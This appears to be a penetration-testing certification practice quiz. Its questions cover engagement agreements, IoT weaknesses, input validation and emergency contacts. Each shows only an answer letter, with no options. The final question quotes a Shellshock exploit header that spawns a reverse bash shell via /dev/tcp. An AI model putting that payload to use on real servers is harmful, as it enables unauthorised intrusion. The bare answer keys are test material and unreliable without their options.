Which of the following documents must be signed between the penetration tester and the client to govern how any provided information is managed before, during, and after the engagement?
Correct Answer:
B
Which of the following is the MOST common vulnerability associated with IoT devices that are directly connected to the Internet?
Correct Answer:
A
A penetration tester is testing input validation on a search form that was discovered on a website. Which of the following characters is the BEST option to test the website for vulnerabilities?
Correct Answer:
C
Which of the following situations would require a penetration tester to notify the emergency contact for the engagement?
Correct Answer:
D
A penetration tester discovers a vulnerable web server at 10.10.1.1. The tester then edits a Python script that sends a web exploit and comes across the following code:
exploits = {"User-Agent": "() { ignored;};/bin/bash -i>& /dev/tcp/127.0.0.1/9090 0>&1", "Accept": "text/html,application/xhtml+xml,application/xml"}
Which of the following edits should the tester make to the script to determine the user context in which the server is being run?
Correct Answer:
A